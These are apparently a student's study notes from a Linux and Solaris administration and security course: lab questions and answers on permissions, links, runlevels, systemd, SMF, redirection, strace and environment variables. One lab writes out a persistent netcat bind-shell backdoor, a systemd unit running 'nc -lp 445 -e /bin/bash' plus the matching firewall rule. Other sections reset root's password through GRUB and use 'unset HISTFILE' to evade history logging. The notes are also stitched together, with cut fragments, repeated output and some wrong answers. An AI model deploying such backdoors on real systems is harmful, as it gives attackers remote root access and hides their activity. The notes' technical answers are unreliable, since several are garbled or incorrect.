Linuxnotes
Linuxnotes
Answer: The kernel is a set of critical programs that provide an environment where user
processes can execute and interact with system resources in a secure manner.
2. Describe the mechanisms of process instantiation on Unix systems. Answer: A process is created with two system calls: exec() and fork()
3. What information constitutes the metadata of a file? Where is the metadata stored? Answer: Information about the object such as object
type (e.g., regular file, directory, pipe, etc.), access permissions, timestamps, etc. The metadata for the object is stored in a data structure
called an inode.
4. What are the standard directories found in the root of the Unix file system and what is stored within each?
5. What indicators of compromise might one look for when analyzing the file system? Answer: When analyzing processes for anomalies, one of
the important things to look is the location of the executable of any log files or any other open resources.
6. In simple terms, what is a process? Answer: Processes are programs that run in user space. In addition to running user programs,
including application services, processes also run a large number of programs for the OS that do not require kernel space access.
7. List some common processes expected on a standard Linux box, but not on a Solaris box and vice versa. Answer: Page 163
8.
The configuration files for programs are typically located in which directory? /etc
The startup configuration files for the system services are located in which directory for a systemD system? The mechanics of starting or
stopping daemons is performed by a set of shell scripts, often called init scripts or rc scripts. In a typical SystemV Unix system, the directory
named /etc/rc.d/init.d contains the startup script for each system service. This script is provided by the writer of each piece of software and
must be written to accept one parameter - the action to take when script is run. In a typical systemd Unix system, the directory
/etc/systemd/system or /lib/systemd/system typically contains the startup unit for each system service.
The log files for programs are typically found in which directory? /var/log
Information about the running instance of a program can be found in which directory? /proc
Give the syntax/command to show which groups the intern01 is a member of and list which groups (if any) are returned. #groups intern01
Add a group the CentOS machine called hackers, and provide the syntx/command used. #groupadd hackers
Set the owner of the getUID file to the root account and provide the syntax/command used. #chown root getUID
Set the group of the getUID file to hackers and provide the syntax/command used. #chgrp hackers getUID
Explicitly set the octal permissions of the getUID file to: User/Owner: Read/Write/Execute, Group: Read/Execute, Other: None What
syntax/command was used? #chmod 0750 getUID
Complete the following actions: Add the user intern01 to to the hackers group. What syntax/command was used? #usermod -a -G hackers
intern01
Set the SUID flag on the program getUID. What syntax/command was used? #chmod u+s getUID
Change the user and group owners to match the exhibit. #su root #chown leale:managment data1 #chown enairn:engineer data2 #chown
rsanch:syseng data3
Change the data file permissions to match the exhibit. Use the absolute octel notation.
Command Definition
Cat [FILE] Concatenate file to screen
cd Change directory
cp [source] [target] Copy source to target
File Determine file type
Find Search for files in directory hierarchy
Grep PATTERN [FILE] Print lines matching PATTERN from FILE
Groupadd Create a new group
Groups Print the groups a user belongs to
Head [FILE] Output first 10 lines of a file
Less [File] Similar to more but handles larger files much
faster
Locate Find files by name (Linux)
Ln -s [target] [link_name] Create symbolic link from SOURCE to
LINK_NAME
Ls Directory listing
Man Display online help
Man -k SEARCH_STRING Search for specified SEARCH_STRING in man
page
More [FILE] Output the contents
st
# touch /tmp/file.txt
# touch /tmp/other.txt
Create a soft (or symbolic) link in the root account's home directory named myTempFile that links to /tmp/file.txt.
What syntax/command was used?
# ln -s /tmp/file.txt myTempFile
What is the expected output of the following?
hello world
Run the following commands and explain the results:
# rm -f /tmp/file.txt
# ls -l myTempFile
Deleting the original file will break the symbolic link. The output of the ls command will turn the file myTempFile red.
# cat myTempFile
No such file or directory. The original file that the link points to is gone.
Create a hard link in the root account's home directory named otherTempFile that links to /tmp/other.txt.
What syntax/command was used?
ln /tmp/other.txt otherTempFile
# cat otherTempFile
Additionally, explain the critical difference between hard and soft links.
The command cat displays the contents of the file:
one
two
three
In hard links, deleting the sourcefile doesn’t affect the newfile.
Finding files that match certain criteria is a common task on a filesystem. Linux and BSD variants generally install the locate package, which
creates an indexed database of filenames (created using the updatedb command and usually installed as a cron job) and uses the locate
command to find files. The locate command is fast, but it is limited to searching filenames.
All UNIX variants support the find command, and it can search on a much more robust set of characteristics than locate. The search can be
slow as the query is conducted in real time. The find command is powerful but has a bit of a learning curve.
The basic syntax of the find command is shown below:
Path
<path> Indicates the path in the filesystem to begin the search and recursively searches unless configured otherwise.
Criteria
-name - Examine the filename. Wildcards (*) can be used.
-user - Examine the owner of the file.
-perm - Examine file permissions.
Note: Multiple criteria are joined with a Boolean 'and' operator by default.
Actions
The actions can be useful but are beyond the scope of this lesson. By default, if no actions are added, the -print action is assumed, which
prints all matches to STDOUT.
Example
The following syntax/command can be used to search the entire filesystem for any file named passwd:
# locate apache2.conf
# locate /etc*apache2.conf
The first locate command will search the entire filesystem for a file named apache2.conf.
The second locate command will only search the directory /etc for a file named apache2.conf.
Run the following commands on the Solaris machine as the user root and explain the results:
locate httpd.conf
locate */httpd.conf
The first locate command will search the entire filesystem for a filename that contains httpd.conf.
The second locate command will search the entire filesystem for a filename that matches exactly httpd.conf.
On the CentOS, Ubuntu and Solaris machines, find all files owned by the root user and document the syntax/command used.
Note: Ubuntu commands will need to be run with the sudo command.
Note: Ubuntu commands will need to be run with the sudo command.
More Notes
UID PID PPID C STIME TTY TIME CMD
root 0 0 0 09:35:46 ? 0:01 sched day and time did the machine start
root 5 0 0 09:35:44 ? 0:01 zpool-rpool
root 0 0 0 09:35:47 ? 0:00 kmem_task kmem_task is a Solaris 11 process. init, which is expected to be present and with a PID of 1 is
running from /usr/sbin (Solaris 10 init runs from /sbin).
root 0 0 0 09:35:47 ? 0:00 /usr/sbin/init
root 0 0 0 09:35:47 ? 0:00 pageout
root 0 0 0 09:35:47 ? 0:00 fsflush The answer is Solaris. The first entry is the kernel thread sched, which indicates that this process
list came from a Solaris system. The two kernel threads (note they have a PPID of 0 called pageout and fsflush) again indicate that this is a
Solaris system.
root 7 0 0 09:35:47 ? 0:00 intrd
root 8 0 0 09:35:47 ? 0:00 vmtasks
root 117 0 0 09:35:57 ? 0:00 /usr/lib/pfexecd
root 11 l 0 09:35:48 ? 0:02 /lib/svc/bin/svc.startd
root 13 1 0 09:35:48 ? 0:10 /lib/svc/bin/svc.configd
root 620 0 0 09:36:03 ? 0:00 /usr/sbin/nscd
netadm 381 l 0 09:36:00 ? 0:00 /lib/inet/nwamd
netcfg 40 l 0 09:35:51 ? 0:00 /lib/inet/netcfgd
root 734 710 0 09:36:06 ? 0:00 /usr/lib/hal/hald-addon-storage
root 709 0 0 09:36:04 ? 0:00 /usr/lib/hal/hald --daemon yes
dladm 48 0 0 09:35:53 ? 0:00 /usr/sbin/dlmgmtd
root 753 0 0 09:36:07 ? 0:00 /usr/lib/inet/inetd start
daemon 65 0 0 09:35:54 ? 0:00 /lib/crypto/kcfd
$ cd /tmp
$ touch ford.txt
$ ln -s ford.txt link_ford.txt
$ rm -f ford.txt
$ ls -alg link_ford.txt
lrwxrwxrwx 1 root 9 May 19 13:09 link_ford.txt -> ford.txt
3. Modify and change
4. Access
What timestamps will update on the directory when using tab completion?
A directories atlme updates whenever its contents are read. The system does this when it uses tab completion to display the filenames of the
directory.
# ls /root/initrd_ex/contents/bin
awk
findmnt
mknod
systemctl
bash
flock
mount
systemd-cgls
cat
gawk
mv
systemd-escape
cp
grep
ping
systemd-run
dmesg
gzip
plymouth
systemd-tmpfiles
dracut-cmdline
journalctl
ps
teamd
dracut-cmdline-ask
kbd_mode
readlink
teamdctl
dracut-emergency
kmod
rm
teamnl
dracut-initqueue
less
sed
tr
dracut-mount
ln
setfont
true
dracut-pre-mount
loadkeys
setsid
udevadm
dracut-pre-pivot
loginctl
sh
umount
dracut-pre-trigger
ls
sleep
uname
dracut-pre-udev
mkdir
stat
vi
echo
mkfifo
stty
Explain what the following command does:
# /usr/lib/dracut/skipcpio ../initramfs.img | gunzip | cpio -id
The skipcpio command will extract concatenated cpio archives such as the initramfs.img file.
The gunzip command then unzips the archive.
The cpio command will copy files out of the unzipped archived.
What is the first process spawned by Solaris after the kernel is loaded?
# ps -elf
FS UID PID PPID C PRI NI ADDR SZ STIME TTY TIME CMD
1 T root 0 0 0 0 SY ? 0 Oct 30 ? 100:11 sched
What are the initial processes in SysV and SMF, respectively?
Change to runlevel 2
Verify the runlevel has changed
Capture the state of the services using the svcs command to a file named s1.txt
Capture the process list using the ps -efcommand to a file named p1.txt
# init 2
# who -r
# svcs > s1.txt
# ps -ef > p1.txt
Complete the following actions and document the commands/syntax used:
Change to runlevel 3
Capture the state of the services using the svcs command to a file named s2.txt
Capture the process list using the ps -ef command to a file named p2.txt
Use the diff command to compare the contents of the services and process files
Record how many services are running in runlevel 3 that are not running in runlevel 2
# init 3
# svcs > s2.txt
# ps -ef > p2.txt
# diff s1.txt s2.txt
# diff p1.txt p2.txt
Using the svcs command, identify how many dependencies the sendmail service has and record the syntax/command used.
Instruction
Telnet into the sendmail server with the following command:
# telnet 127.0.0.1 25
The sendmail server will give a response. Type the following to exit telnet:
<CTRL> + ]
quit
Using the svcs milestone command, identify how many system milestones are present and record the syntax/command used.
Note: Changing milestones directly can lead to system unstable system states. Milestones are not designed to be backtracked into (i.e., a
system should not be switched back into single-user-mode once in multi-user-mode).
The system remained in run-level 3 (multi-user) instead of going to run-level 1 (single user).
Reboot the machine. Record the runlevel and milestone the machine booted into and the syntax/command used
# who -r
. run-level multi-user Nov 3 09:26 S 0 0
Change to the all milestone and document the syntax/command used.
# svcs -a
The all milestone will start all enabled services.
Use the svcs command to determine whether the Apache web server is enabled for the multi-user milestone and record the syntax/command
used
What syntax/command was used to determine the default run level of the CentOS machine?
systemctl get-default
What syntax/command shows all active services on the machine?
systemctl list-units
What syntax/command shows the status of the crondservice?
Log into the Solaris machine again and attempt another SSH session to the CentOS machine.
Explain the results of the attempt.
Connection succeeded since the SSHD process is still running. Stopping the SSH service will not kill the active daemon, but upon reboot it will
no longer be running.
Reboot the CentOS machine using the init command in the SSH session.
What syntax/command was used?
init 6
Log into the CentOS machine and run the following command:
# systemctl status sshd
Explain what the loaded and active output lines indicate.
The loaded field indicates that the module was found and loaded, but it is disabled on boot.
The active field indicates that the process is not currently running.
Enable the SSH service to start on boot.
What syntax/command was used?
systemctl enable sshd
Explain what the loaded and active output lines indicate using the following command:
# systemctl status sshd
The loaded field indicates that the module was found and loaded, and it is enabled on boot.
The active field indicates that the process is not currently running.
Document the steps an administrator would take to change root's password on a CentOS machine by modify the GRUB boot record.
Warning: Only perform these actions on a local/physical machine.
Boot into single-user mode, which does not require a password, then reset the root password with the passwd command
Change the ro option to rw init=/bin/bash
Mount the root filesystem using the command chroot /sysroot/
Use the passwd command to change the root password
Use the reboot -f command to restart the machine
Use the following commands to create a persistent backdoor using netcat on the CentOS machine.
# cd /etc/systemd/system/
# vi backdoor.service
The contents of the backdoor.service file:
[Unit]
Description=Netcat backdoor daemon
Documentation=man:nc(1)
After=network.target
[Service]
Type=simple
ExecStart=/usr/bin/nc -lp 445 -e /bin/bash
Restart=always
[Install]
WantedBy=multi-user.target
Reload the daemons and enable the backdoor:
# systemctl daemon-reload
# systemctl start backdoor
# systemctl status backdoor
Allow incoming connections on port 445 through the firewall:
# firewall-cmd --add-port 445/tcp
Connect to the backdoor using the Solaris machine.
What syntax/command was used?
nc 10.10.1.40 445
Establish backdoor persistence on the CentOS machine after a restart.
What syntax/command was used?
Enable the service by using the following command:
systemctl enable backdoor
Restart the CentOS machine and try to connect to the backdoor from the Solaris Machine.
Was the connection successful?
Why or why not?
The firewall entry to allow port 445 was removed after the CentOS machine restarted. The
--permanent flag needs to be added to the firewall-cmdcommand to allow the port to remain open after reboot.
Disable the backdoor, stop the backdoor service, and remove any files associated with backdoor.service. Record the syntax/commands used.
multi-user.target
Which variable in the /etc/default/grub file would need to be edited in order to change the timeout from five seconds to fifteen seconds?
GRUB_TIMEOUT
# cat
Note: The cat command treats command line arguments as filenames and will open the files in order and write their contents to
STDOUT. A redirection operator (>) can be used to send the output to a file instead of STDOUT.
Run the following command to show the contents of the ex1 file:
# cat /tmp/ex1
cat /etc/shadow uses command line arguments to display the information, while cat < /etc/shadow will read a file from STDIN and
display the information.
Run the commands below and explain what happened to the output streams:
# cat "Hello World" > ex1
# cat ex1
The cat command runs and waits for the user to type something. Any content it receives is now appended to the ex1 file.
# cat ex1
Hello World
Run the following commands and record the results:
# echo "Hello World" | cat> ex1
# cat < ex1
# cat < ex1 > ex1
# echo < ex1 > ex1
# echo ex1 >> ex1
# cat < ex1 > box
# cat < ex1 | cat >> ex1
# cat < ex1 >> ex1
<CTRL> + <C>
# echo Clean the floor & cat box
# echo "Clean the floor & cat box"
Run this same sequence of commands on the Solaris machine and note any differences.
Uses cmd line arguments as input through echo and redirects STDOUT (via pipe) to the STDIN of cat, which will then redirect STDOUT to
the ex1 file. This places the text "Hello World" into the ex1 file.
The tee command reads from standard input and writes to standard output and files simultaneously.
The following command will generate a file listing and pipes STDOUT to the STDIN of the tee command, which creates a file
named filelisting and pipes STDOUT to STDIN of less:
Note: Tar is short for tape archive and was originally used to create backup tapes. However, it has been re-purposed as a method of
packaging a directory structure into a single file, typically called a tarball. Consult the man page for more information.
# mkdir /tmp/backup
# cd /tmp/backup
Use the tar command to create a backup of the /var/run directory named run.tar in the /tmp/backupdirectory, then extract
the run.tar backup into the /tmp/backup directory.
Answer the following:
# rm -rf /tmp/backup/*
Note: The /var/run directory contains symbolic links. By default the tar command will not follow symlinks and add them to the archive.
# cd /tmp/backup
# tar -hcf run.tar /var/run
# tar -xvf run.tar
# ls -l
total 8600
-rw-r--r--. 1 root root 8806400 Nov 3 16:07 run.tar
drwxr-xr-x. 3 root root 17 Nov 3 16:07 var
Write a chain of commands with the ; operator to complete the following and record the syntax/command used:
Change directory to /var/run
Tar the contents of the /var/run directory into /tmp/backup/run.tar
Change directory back to /tmp/backup
Document the final command below
CentOS
# which ps
/usr/bin/ps
#file `which ps`
/usr/bin/ps: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for
GNU/Linux 2.6.32, BuildID[sha1]=3ca95c5bfec071ba29e28124db03a693d9423904, stripped
Solaris
# which ps
/usr/bin/ps
#file `which ps`
/usr/bin/ps: ELF 32-bit LSB Executable 80386 Version 1, dynamically linked, stripped
On the CentOS machine, run the following stracecommands and describe the differences:
# strace ps | less
Did the command work? Why or why not?
The strace command is producing output via the STDERR stream.
The pipe operator is expecting the data it is sending to the less command to come from the STDOUT stream.
Document the appropriate strace syntax to complete the following:
Redirect the strace command output to a file named pstrace1.txt using shell redirection operators.
Redirect the strace command output to a file named pstrace2.txt without using shell redirection operators.
# strace -o pstrace_2.txt ps
Where in the file system is the strace command locating information for the ps command?
Note: The PID of the processes may be useful in referencing information within the pstrace1.txt file.
/proc/<PID>
# strace -o pstrace1.txt ps
PID TTY TIME CMD
13039 pts/0 00:00:00 bash
30961 pts/0 00:00:00 strace
30963 pts/0 00:00:00 ps
# cat pstrace1.txt | grep 13039
read(3, "30930 (ps) R 30928 30928 13039 3"..., 1024) = 313
stat("/proc/13039", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
open("/proc/13039/stat", O_RDONLY) = 6
read(6, "13039 (bash) S 13031 13039 13039"..., 2048) = 356
open("/proc/13039/status", O_RDONLY) = 6
readlink("/proc/13039/fd/2", "/dev/pts/0", 127) = 10
write(1, " 13039 pts/0 00:00:00 bash\n", 30) = 30
read(6, "30928 (strace) S 13039 30928 130"..., 2048) = 331
read(6, "30930 (ps) R 30928 30928 13039 3"..., 2048) = 313
Answer the following questions regarding the pstrace1.txt file.
What command will find all references to the user's BASH shell?
How many lines refer to this PID?
What system call is used to print output to the screen?
Find all references to the user's BASH shell PID :
# strace ps -o pstrace1.txt
PID TTY TIME CMD
13039 pts/0 00:00:00 bash
30961 pts/0 00:00:00 strace
30963 pts/0 00:00:00 ps
# cat pstrace1.txt | grep 13039
read(3, "30930 (ps) R 30928 30928 13039 3"..., 1024) = 313
stat("/proc/13039", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
open("/proc/13039/stat", O_RDONLY) = 6
read(6, "13039 (bash) S 13031 13039 13039"..., 2048) = 356
open("/proc/13039/status", O_RDONLY) = 6
readlink("/proc/13039/fd/2", "/dev/pts/0", 127) = 10
write(1, " 13039 pts/0 00:00:00 bash\n", 30) = 30
read(6, "30928 (strace) S 13039 30928 130"..., 2048) = 331
read(6, "30930 (ps) R 30928 30928 13039 3"..., 2048) = 313
Number of PID references:
# strace ps -o pstrace1.txt
PID TTY TIME CMD
13039 pts/0 00:00:00 bash
30961 pts/0 00:00:00 strace
30963 pts/0 00:00:00 ps
# cat pstrace1.txt | grep 13039
read(3, "30930 (ps) R 30928 30928 13039 3"..., 1024) = 313
stat("/proc/13039", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0
open("/proc/13039/stat", O_RDONLY) = 6
read(6, "13039 (bash) S 13031 13039 13039"..., 2048) = 356
open("/proc/13039/status", O_RDONLY) = 6
readlink("/proc/13039/fd/2", "/dev/pts/0", 127) = 10
write(1, " 13039 pts/0 00:00:00 bash\n", 30) = 30
read(6, "30928 (strace) S 13039 30928 130"..., 2048) = 331
read(6, "30930 (ps) R 30928 30928 13039 3"..., 2048) = 313
Based on the output of the following command, does the ps command use the fork or exec system call?
Note: This chain of commands shows a sorted, unique list of the system calls used by the ps command.
No, the ps command uses the exec system call.
# cat pstrace1.txt | awk -F '(' '{ print $1 }' | sort | uniq | grep exec
execve
# cat pstrace1.txt | grep fork
# cat pstrace1.txt | grep exec
execve("/usr/bin/ps", ["ps"], [/* 42 vars */]) = 0
Run the following command to compare the root.console and root.ssh text files:
Examine the process information for the current shell using the following command:
# ps -ef | grep $$
What does the $$ variable represent?
$$ indicates the current PID.
Which commands can be used to compare text files in Unix? List all that apply and record the syntax/command used.
# echo $0
bash
# ps -ef | grep $$
root 13039 13031 0 07:19 pts/0 00:00:00 bash
root 49553 13039 0 12:07 pts/0 00:00:00 ps -ef
What is the current directory?
# pwd
/home/intern01
What is the home directory of both root and intern01 specified in their environment?
# ifconfig -a
The command returns the interface configuration.
# which ifconfig
/usr/sbin/ifconfig
Which directory contains the ifconfig executable?
# which ifconfig
/usr/sbin/ifconfig
Change the entries in PATH by entering the following text into the shell window.
# PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin:/home/intern01/.local/bin:/home/intern01/bin
Run the ifconfig -a command in the root shell window using the full file path and record the syntax used.
/usr/sbin/ifconfig -a
# echo $PATH
# export PATH=${PATH}:/usr/sbin
# echo $PATH
# ifconfig -a
The path variable indicates where to look for binaries when running a program from the command line. If a path is not present inside of
the PATH variable, the complete path name must be used to run the program.
Exercise Takeaway
Always use full command paths. It can be difficult to predict what the PATH will look like in various environments, so users may be
unable to run commands not in the PATH. Users may run a malicious version of a command from a directory that appears earlier in the
PATH variable.
The su command lets users run commands as the root role, but it does not change to the root user when invoked in this way.
The /proc directory contains a folders named after currently running processes. Record the command used to view the environ file of
the current shell's parent process.
# cat /proc/$PPID/environ
Pipe the output of the previous command to the following tr command to clean up the output and determine the value of the SHELL
environment variable:
tr '\0' '\n'
Note: The environ file uses the null character (\0, ASCII 0) instead of the newline character (\n, or ASCII 10) to separate records. This
command will replace the null character with a newline to make the output legible.
# pargs -e $PPID
Complete the following steps and explain the differences in the ps command output:
# ps-ef grep $$
# ifconfig -a
The command executes because the environment variables of the new shell have not been modified.
Log into the Solaris machine as root and enter the following. Record any differences between ls and ls -a:
# cd ~
# ls
# ls -a
The -a option of the ls command displays hidden files. Hidden files are notated by a period at the beginning of the file name.
Look at the last line of the .bash_history file using the tail command and answer the following:
$ su root
# who am i
# exit
$ exit
SSH into the CentOS machine as the intern01 user and run the following:
$ su root
# cd /var
# cd log
# head messages
# unset HISTFILE
# exit
$ exit
Are any of the commands written to root's history?
The commands should not be written to root’s history.
<html>
<body>
Hello!
</body>
</html>
# ps -lA | grep web.sh
0 S 0 67339 67213 0 80 0 - 28283 do_wai pts/1 00:00:00 web.sh
1 S 0 67516 67339 0 80 0 - 28283 pipe_w pts/1 00:00:00 web.sh
All processes with a parent of the script:
# ps -lfA | grep 67339
0 S root 67339 67213 0 80 0 - 28283 do_wai 14:27 pts/1 00:00:00 /bin/bash ./web.sh
0 S root 67514 67339 0 80 0 - 26981 pipe_w 14:27 pts/1 00:00:00 cat www_fifo
0 S root 67515 67339 0 80 0 - 11004 poll_s 14:27 pts/1 00:00:00 nc -l 8080
1 S root 67516 67339 0 80 0 - 28283 pipe_w 14:27 pts/1 00:00:00 /bin/bash ./web.sh
Explain what the web.sh script is doing.
Run the web.sh script to find the temp.html file using the machine's web browser and record which URL was used.
localhost:8080/temp.html
Or
127.0.0.1:8080/temp.html
Or
<CentOS IP>:8080/temp.html
Which line of the script provides the branch that ensures a file exists in the /var/www directory?
13 if [ -f "$filename" ]; then
Close the web server and open it with a new invocation that will cause the script to listen on port 8082.
This line does not indicate a script argument. It indicates an argument to the awk command.
The fifth column of the long listing of a file indicates its file size.
# ls -l /var/www/temp
-rw-r--r--. 1 root root 37 Nov 6 14:42 /var/www/temp
The output of the ls -l command is piped to the awk command, which uses $5 to indicate the fifth column of the data it received
should be displayed.
What command should be run to view the current runlevel when working with systemd?
runlevel
who -r
Either is correct.
What file does the init command rely on to determine what to do when booting or changing the runlevel?
/etc/inittab or inittab
What command ensures that the httpd service does not start on boot when working with systemd?
Note: You may want to run the command on your CentOS machine to verify that it works.
systemctl disable httpd
Log in at the console. Assume that no other users are logged in to the system and that no commands have run.
Which process would you expect to see running on a SystemV system but NOT on a Solaris system?
According to the diagram, SystemV would have initand login and shell running if someone logged in using the console, but Solaris
would have init and shell running (no login process). SystemV has initrunning, init makes a copy of itself forks() which then
changes exec() to getty. getty then changes (exec) to login. Once someone logs into the machine, login makes a copy of itself (forks)
which changes exec() to shell.
Type the ls command (use shell expansion) to list all filenames that begin with the letter "a".
Note: Shell expansion is similar to REGEX in syntax
ls a*
Assume these commands are run in a BASH Shell on a CentOS machine. Use shell expansion to match all filenames that begin with the
letter "e" or the letter "d".
ls [de]*
Assume these commands are run in a BASH Shell on a CentOS machine. Use the ls command and shell expansion to match all
filenames that contain the sequence "ea."
ls *ea*
Assume these commands are run in a BASH Shell on a CentOS machine. Use the ls command and shell expansion to match all
filenames that do not end with the letter "r."
ls *[!r]
When a user presses Ctrl+Z to stop a process, that process will still exist in the process list.
True
Use the following output to identify the fourth script/executable referenced in the inittab that will run upon booting into the default
runlevel.
# cat /etc/inittab
id:3:initdefault:
# System initialization.
si::sysinit:/etc/rc.d/rc.sysinit
x0:0:wait:/etc/rc.d/rc 0
x1:1:wait:/etc/rc.d/rc 1
x2:2:wait:/etc/rc.d/rc 2
x3:3:wait:/etc/rc.d/rc 3
x4:4:wait:/etc/rc.d/rc 4
x5:5:wait:/etc/rc.d/rc 5
x6:6:wait:/etc/rc.d/rc 6
# Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
# When our UPS tells us power has failed, assume we have a few minutes
# of power left. Schedule a shutdown for 2 minutes from now.
# This does, of course, assume you have powered installed and your
# UPS connected and working correctly.
pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"
# If power was restored before the shutdown kicked in, cancel it. pr:12345:powerokwait:/sbin/shutdown -c "Power
Restored; Shutdown Cancelled"
# Run gettys in standard runlevels
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty ttys
6:2345:respawn:/sbin/mingetty tty6
# Run xdm in runlevel 5
x:5:respawn:/etc/X11/prefdm -nodaemon
2:2345:respawn:/sbin/mingetty tty2
Explanation
# Any lines that begin with (#) are considered comments and are not executed
id:3:initdefault: (Sets the default run level for the box, not a script)
si::sysinit:/etc/rc.d/rc.sysinit (Always executed, script 1)
x3:3:wait:/etc/rc.d/rc 3, (Executed as it is the default run level, scrip 2)
The following are conditional, so they won’t execute automatically.
ca::ctrlaltdel:/sbin/shutdown -t3 -r now (Not an external script)
pf::powerfail:/sbin/shutdown -f -h +2 "Power Failure; System Shutting Down"
pr:12345:powerokwait:/sbin/shutdown -c "Power Restored; Shutdown Cancelled"
1:2345:respawn:/sbin/mingetty tty1 (Script 3)
2:2345:respawn:/sbin/mingetty tty2 (Script 4)
Answer: ls r??
Shell expansion and Patterns
? Matches exactly one character
?? Matches exactly two characters
Type the name of the BASH Shell command history logfile on a CentOS machine.
The following command typed inside of a BASH Shell will display the location of the logfile:
# echo $HISTFILE
System V: A Major common ancestor of many Unix systems released by AT&T in 1983. PAGE 5
Solaris page 6
Timedatectl page 19
Truss – f -v “last, lsat64” ls -d /etc/passwd/ 2>&1 | grep “[amc]t = “ used before solaris 10 page 21
Which Command page 24 locate page 25 find page 26 mount page 27 recover a file page 27 df -h page 28
Kernel threads page 36, parent child relationships page 37, zombie process page 38 Solaris process list page 39
Process list fields page 40, Linux process list page 41, lsof page 43, /proc page 44
Init page 54, runlevels page 54, system 5 page 54, /etc/initab page 55, /etc/rc.d/rc page 58, startup scripts
rc.sysinit and /etc/inittab page 59, chkconfig page 59, service mysvc start page 60, System V management commands
page 60, SysV drawbacks page 61, run level comparison page 62, Service Management Facility (SMF) page 62, svcs:
like chkconfig manages which services tart at boot page 62, systemd page 63, system service management commands
page 64, systemctl page 64, init process runs after system startup page 68, getty page 68, shell initialization
page 69, Secure shell initialization page 69, Common shells page 70, shell features page 71, stdin, stout, stderr
page 72, job control page 72, bg fg command page 73, sigkill, sighup, sigstop, sigterm, sigtstp, sigint page 74,
redirection page 74, expansion and patterns bash shell page 75, Command substitution page 77, Shell modes login vs
non-login page 78, histfile and histsize page 83, Scripting fundamentals page 85,